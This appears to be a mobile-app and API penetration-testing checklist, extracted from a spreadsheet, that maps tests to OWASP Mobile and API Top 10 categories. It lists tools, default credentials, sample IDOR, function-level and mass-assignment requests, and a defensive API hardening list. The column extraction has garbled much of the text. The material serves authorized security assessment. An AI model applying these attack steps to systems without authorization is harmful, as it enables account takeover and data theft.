Dynamic and Rooted or Jail-broken device checking
Runtime Passwords/ Connection String disclosure
analysis Hidden and Unscrutinised functionalities
 Test Name
Insecure Transport Layer Protocols
Use of Insecure and Deprecated algorithms
Use of Disabling certificate validation
Communicatio SSL pinning Implementation
n Channel End-to-end encryption

Test Name
Excessive port opened at Firewall
Default credentials on Application Server
Weak password
Exposure policy Implementation
of Webservices through WSDL
document
Security Misconfiguration on Server API
Security Patching on Server API
Input validation
Information on APIthrough API response
Exposure
message
Control of interaction frequency on API
(Replay Attack)
Session invalidation on Backend
Session Timeout Protection
Cookie Rotation
Multiple
Exposingconcurrent logins Identifiers in
Device Specific
Attacker Visible Elements
Token/Session Creation and handling
Server Side - Insecure Direct Object references
Webservices Missing function level access control
and API Bypassing business logic flaws
netration testing checklist based on OWASP Top 10 Mobile 2016
Applicable
Description Tool
dex2jar, Clutch, Platform
Disassembling and Decompiling the application
Identify sensitive information through binary/source Classdump
string, jdgui, All
code
Static code modification, Binary patching, Bypass check IDA, Hopper All
sum mechanism apktool, Hopper All
Identify "minSdkVersion" on apktool.yml, the value be apktool, MobSF
Identify excessive App permissions Android
set over than 17. For iOS, identify minOS using idb. Androidmanifes
apktool, idb All
Identify android exported
Check "android:allowBackup" components
attribute t.xml
which should be Androidmanifes Android
set to "false"
Identify insecure/deprecated cryptographic algorithms Qark,t.xmlHopper, Android
(RC4, MD5, SHA1) on sourcecode iFunbox
Identify hardcoded key in application or Keys may be Qark, Hopper, All
intercepted via Binary attacks iFunbox
Qark, Hopper, All
Identify implementing their own protocol iFunbox All
Identify "android:debuggable" attribute adb, MobSF Android
Applicable
Misuse of TouchID (Retrieve Description
credentials from Local Tool Platform
Storage,
Ensure thatLocalappAuthen)
cannot execute when the PIN or iDevice iOS
Pattern lock is not enabled. Device
adb, idb, All
Check encryption on database
storage encryption, Shared preferences files iFunbox All
MODE_WORLD_READABLE
Identify Sensitive Data in application files (application adb
iFunbox,Binary Android
log, Cache file, Cookie) CookieReader
adb logcat, idb, All
Identify sensitive information through application log libimobiledevice
Device, All
Identify disabling
Identify application snapshot/screenshot
Copy/Paste function forbackgrounding
sensitive part iFunbox All
of the application on EditText/UITextField
/data/data/com.android.providers.userdictionary/databa idb,
Device, iFunbox
idb, All
ses/user_dict.db
For iOS, Use iTune to backup application folder in iFunbox
Backup All
order to check sensitive info from backup folder Extractor
adb, idb, All
Identify user's
Perform binarypassword or sessions
attacks against on theapp
the mobile device iFunbox
in order Cycript, Snoop- All
to bypass offline authentication
execute privileged functionality that should only be it, Burpsuite
Cycript, Snoop- All
executable with a user of higher privilege it, Burpsuite All
Identify SQLi
component inand
orderLFItoon Content
directly provider
access and component
sniff the Drozer Android
information Drozer Android
Invoke Service component
(Javascript/File directlyXSS through
access/Plugins), Drozer Android
UIWebview jdgui, iDevice
adb, iDevice, All
IdentifyLFI
Check SQLi
on and XMLi on application
application(../ , ../../blah\0) Webviews Burpsuite All
FileAccess attack through setAllowFileAccess
For Android: Identify URL schemes through source jdgui,
apktool, iDevice
jdgui, All
code or manifest file
Identify sensitive information masking (Creditcard no. Clutch,
Device,Strings All
on UI and HTTPs traffic) Burpsuite
Frida, Cycript, All
Run-time
the manipulation,
file containing Method
the code swizzling
and restart the app. Or Snoop-it
tsProtector, All
Install tools like hidemyroot and run the
Identify sensitive information (Credential) betweenapps RootCloak2 All
mobile and API jdgui, Burpsuite All
Identify extraneous functionality (Hidden back-end URL) jdgui, Burpsuite All
 Applicable
Description
Observe the device's network traffic through a proxy Tool Platform
that SSL is implemented or not Burpsuite
Qualys SSL All
Identify
Allow SSL/TLS
tester Encryption
to intercept SSL Algorithms
traffic without Certificate jdgui,Labs
MobSF, All
installation (checkServerTrusted
setAllowsAnyHTTPSCertificate(iOS) withand
nobody) jdgui,Qark
MobSF, All
AllowAllHostnameVerifier(Android) Qark All
Identify end-to-end encryption on application layer Burpsuite All
Applicable
Description Tool Platform
Identify opened
Tomcat portserver
Application at Server-side URL/IP Address
using tomcat/tomcat, Nmap All
admin/tomcat)
mobile and server side (e.g. Bypass password Web Browser All
complexity
Identify checking on
webservices helpUI)pages (*.asmx) which show Burpsuite All
methods and structure
Identify webserver configuration (e.g. Error handling, Web Browser
Web Browser, All
HTTP response banner) Burpsuite All
Identifyinput
Check vulnerability
validationon(e.g.
serverSQLAPI
Injection, XXE) on Nessus All
API/Webservices
Identify sensitive information on API response Burpsuite All
message/header
Conduct simultaneous attack on API (e.g. OTP, email Burpsuite
Burpsuite All
sending)
Ensure that all session invalidation events are executed (Intruder) All
on the server
Mobile app mustsidehave
and adequate
not just ontimeout
the mobile app on
protection Burpsuite All
the backend
during components
authentication state changes Burpsuite All
(Anonymous<->User, User A<->User B, Timeout)
Simultaneously login from multiple device with the same Burpsuite All
credential
that Device's information (UDID) is sent during the Burpsuite All
transmission
complex, andor not.
pseudo-random so as to be resistant to Burpsuite All
guessing/anticipation
Directly attacks.object/var through HTTPs
access unauthorised Burpsuite All
traffic
Directly access unauthorised function through HTTPs Burpsuite All
traffic
Bypass business logic data validation, Circumvention of Burpsuite All
Work Flows Burpsuite All
OWASP Result
M9 Issue
M9 Issue
M8 Issue
M1 Issue
M1 Issue
M1 Issue
M2 Issue
M5 Issue
M5 Issue
M5 Issue
M10 Issue

OWASP Result
M1 Issue
M1 Issue
M2 Issue
M2 Issue
M2 Issue
M2 Issue
M2 Issue
M2 Issue
M2 Issue
M2 Issue
M4 Issue
M4 Issue
M6 Issue
M7 Issue
M7 Issue
M7 Issue
M7 Issue
M7 Issue
M7 Issue
M7 Issue
M7 Issue
M8 Issue
M8 Issue
M10 Issue
M10 Issue
OWASP Result
M3 Issue
M3 Issue
M3 Issue
M3 Issue
M3 Issue

OWASP Result
M1 Issue
M1 Issue
M1 Issue
M1 Issue
M1 Issue
M1 Issue
M1 Issue
M1 Issue
M1 Issue
M4 Issue
M4 Issue
M4 Issue
M4 Issue
M4 Issue
M5 Issue
M6 Issue
M6 Issue
M6 Issue
S NO OWASP Top 10 API
A1 - BOLA (Broken Object Level
1 Authorization)

2 A2 - Broken User Authentication

3 A3 - Excessive Data exposure

A4 - Lack of resources & rate
4 limiting
A5 - Broken Function level
5 Authorization (BFLA)

6 A6 -Mass Assignment

7 A7 - Security Misconfiguration

8 A8 - Injection

9 A9 - Improper Asset Management

A10 - Insufficient Logging &
10 Monitoring
 Approach
DELETE /admin/delete_user?user_id=888

Extra protection: Account lockout, captcha, bruteforce attacks

GET /allusersinfo
GET /match_users?from=0
limit the requests value
Rate limiting absent
POST app/admin_panel/users_mgmt.aspx
action=delete&user_id=1337
Always try with GET, POST, PUT & PATCH
User Mass assignment to bypass other Security Controls
weak encryption
etc

SQL, NoSQL, BlindSQL, commandinjection etc

mobile-api.acme.com
qa-3-old.acme.com - nonlegitimate

- same as owaspweb2017
 Hackerone reports for reference
Uber full account takover by Anand prakash
(appsecure)
Prakash
reset password token 5digit value - predictable

3fun app - by Alex lomas (pentestpartners)

https://hackerone.com/reports/170310
The code did not properly check What type the
existing account was
account [firstname]="evil" &
account[allow_api_access]=true

https://hackerone.com/reports/426165

https://hackerone.com/reports/768195
https://apisecurity.io/encyclopedia/content/
owasp/api9-improper-assets-management.htm
✓
Authentication
0
0
0

0
0
0
0
OAuth
0
0
0
0
Access
0
0
0
Input
0
0
0
0
0
0
Processing
0
0
0
0
0
0
0
0
Output
0
0
0
0
0
0
0
0
0
0
0
https://github.com/shieldfy/API-Security-Checklist
Task
Authentication
Don't use Basic Auth. Use standard authentication instead (e.g. JWT, OAuth).
standards.
Use Max Retry and jail features in Login.

Use a random complicated key (JWT Secret) to make brute forcing the token very hard.
RS256).

Make token
Don't expiration
store sensitive (TTL,
data in RTTL) aspayload,
the JWT short as it
possible.
can be decoded easily.

OAuth
Always validate redirect_uri server-side to allow only whitelisted URLs.
Always try to exchange for code and not tokens (don't allow response_type=token).
Use state parameter with a random hash to prevent CSRF on the OAuth authentication process.
Define the default scope, and validate scope parameters for each application.

Access
Limit requests (Throttling) to avoid DDoS / brute-force attacks.
Use HTTPS on server side to avoid MITM (Man in the Middle Attack).
Use HSTS header with SSL to avoid SSL Strip attack.
(replace/update), and DELETE (to delete Input
a record), and respond with 405 Method Not Allowed if
the requested method isn't appropriate for the requestedetc.)
supported format (e.g. application/xml, application/json, resource.
and respond with 406 Not
Acceptable response if of
Validate content-type not matched.
posted data as you accept (e.g. application/x-www-form-urlencoded,
multipart/form-data, application/json,
Validate user input to avoid common etc.).
vulnerabilities (e.g. XSS, SQL-Injection, Remote Code
Execution, etc.).
Don't use any sensitive data (credentials, Passwords, security tokens, or API keys) in the URL,
but
Useuse standard
an API Authorization
Gateway service to header.
enable caching, Rate Limit policies (e.g. Quota, Spike Arrest, or
Concurrent Rate Limit) and deploy APIs resources dynamically.
Processing
Check if all the endpoints are protected behind authentication to avoid broken authentication
process.
User own resource ID should be avoided. Use /me/orders instead of /user/654321/orders.
Don't
If you auto-increment
are parsing XMLIDs. Use
files, UUID
make instead.
sure entity parsing is not enabled to avoid XXE (XML external
entity
If you attack).
are parsing XML files, make sure entity expansion is not enabled to avoid Billion
Laughs/XML bomb via exponential entity expansion attack.
Use a CDN
possible for file uploads.
in background and return response fast to avoid HTTP Blocking.
Do not forget to turn the DEBUG mode OFF.

Output
Send X-Content-Type-Options:
Send nosniff header.
X-Frame-Options: deny header.

Send Content-Security-Policy: default-src 'none' header.

Remove
Force fingerprinting
content-type headers
for your - X-Powered-By,
response. Server,
If you return X-AspNet-Version,
application/json, etc. content-type
then your
response is application/json.
Don't return
Return sensitive
the proper data
status likeaccording
code credentials, Passwords,
to the operationor completed.
security tokens.
(e.g. 200 OK, 400 Bad
Request, 401 Unauthorized, 405 Method Not Allowed, etc.).
 CI & CD
Audit your design and implementation with unit/integration tests coverage.
Use a code
Ensure that review process and
all components disregard
of your self-approval.
services are statically scanned by AV software before
pushing to production, including vendor libraries
Design a rollback solution for deployments. and other dependencies.

https://github.com/shieldfy/API-Security-Checklist
[API Pentest Guide]
Blogs & Video links
How to Hack APIs in 2021
https://labs.detectify.com/2021/08/10/how-to-hack-apis-in-2021/

API hacking by Katie Paxton-Fear

https://youtu.be/qqmyAxfGV9c
https://www.youtube.com/watch?v=cWSu2Ja65Z4
https://www.youtube.com/watch?v=yCUQBc2rY9Y&list=PLbyncTkpno5HqX1h2MnV6Qt4wvTb8Mpol

HACKTIVITY
https://www.youtube.com/watch?v=zW8QF3x3oSU
https://www.youtube.com/watch?v=HXci0-NSwOs
API 101 - https://www.youtube.com/watch?v=ijalD2NkRFg
BADAPI - https://www.youtube.com/watch?v=UT7-ZVawdzA

Part1: Introduction | Enumeration | tools

https://www.youtube.com/watch?v=UD6n666nS8I
https://virgool.io/class313/%D9%85%D9%82%D8%AF%D9%85%D9%87-%D8%A7%DB%8C-%D8%A8%D8%B1-%

Part2: XXE | XPath Injection | APi sql injection

https://www.youtube.com/watch?v=AIBC0WRf38A
https://virgool.io/class313/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%

Part3: Xml bomb | command Injection | XST| SSRF

https://www.youtube.com/watch?v=vKm_WHxczow&feature=youtu.be
https://virgool.io/class313/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%

Part4: CORS | SOME | JWT | IDOR

https://www.youtube.com/watch?v=NbJwjnoJr5g&feature=youtu.be
https://virgool.io/class313/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%